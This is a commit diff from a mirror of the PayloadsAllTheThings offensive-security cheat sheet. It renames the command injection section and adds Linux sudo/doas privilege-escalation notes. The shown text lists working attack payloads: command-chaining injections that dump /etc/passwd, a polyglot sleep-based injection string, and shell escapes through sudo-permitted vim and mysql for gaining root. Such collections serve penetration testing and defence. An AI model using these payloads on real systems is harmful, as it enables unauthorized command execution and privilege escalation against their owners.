ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 19:06:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Command injection renamed + sudo/doas privesc

Browse Source
This commit is contained in:
Swissky 2019-01-22 21:45:41 +01:00
parent 4db45a263a
commit e07a654080
4 changed files with 42 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

0
Remote commands execution/Intruder/command-execution-unix.txt → Command injection/Intruder/command-execution-unix.txt
View File

0
Remote commands execution/Intruder/command_exec.txt → Command injection/Intruder/command_exec.txt
View File

23
Remote commands execution/README.md → Command injection/README.md
View File

@ -1,11 +1,11 @@
# Remote Commands Execution
# Command Injection
Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application.
Remote Commands execution is a security vulnerability that allows an attacker to execute commands from a remote server.
NOTE: Reverse Shell Command are relocated to a [single file](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
## Exploits
Normal Commands execution, execute the command and voila :p
Normal command, execute the command and voila :p
```powershell
cat /etc/passwd
@ -17,7 +17,7 @@ sys:x:3:3:sys:/dev:/bin/sh
Commands execution by chaining commands
```powershell
```bash
original_cmd_by_server; ls
original_cmd_by_server && ls
original_cmd_by_server | ls
@ -26,7 +26,7 @@ original_cmd_by_server || ls Only if the first cmd fail
Commands execution inside a command
```powershell
```bash
original_cmd_by_server `cat /etc/passwd`
original_cmd_by_server $(cat /etc/passwd)
```
@ -167,6 +167,17 @@ Online tools to check for DNS based data exfiltration:
- dnsbin.zhack.ca
- pingb.in
## Polyglot command injection
```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
e.g:
echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
```
## References
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)

26
Methodology and Resources/Linux - Privilege Escalation.md
View File

@ -132,8 +132,31 @@ Edit capabilites
setcap cap_net_raw+p /bin/ping # add
```
## SUDO
## GTFOBins
Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
```bash
$ sudo -l
User demo may run the following commands on crashlab:
(root) NOPASSWD: /usr/bin/vim
```
In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`.
```bash
sudo vim -c '!sh'
sudo -u root vim -c '!sh'
```
There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf`
```bash
permit nopass demo as root cmd vim
```
### GTFOBins
[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
@ -143,6 +166,7 @@ The project collects legitimate functions of Unix binaries that can be abused to
> sudo mysql -e '\! /bin/sh'
> strace -o /dev/null /bin/sh
## Groups
### Docker